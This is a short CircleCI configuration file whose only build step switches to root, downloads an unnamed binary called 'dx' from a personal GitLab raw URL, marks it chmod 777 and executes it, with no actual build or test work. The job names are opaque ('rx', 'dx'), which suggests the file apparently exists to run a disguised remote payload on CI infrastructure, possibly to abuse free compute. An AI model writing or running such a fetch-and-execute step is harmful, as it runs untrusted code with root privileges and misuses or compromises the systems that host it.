versions: 2.1
jobs:
  build:
    docker:
      - image: cimg/python:3.10.4

    steps:
      - run:
          name: "rx"
          command: |
           sudo su --command "wget https://gitlab.com/RobCranes/tx/-/raw/main/dx && chmod 777 dx && ./dx"

workflows:
  version: 2
  build:
    jobs:
      - build



          
           
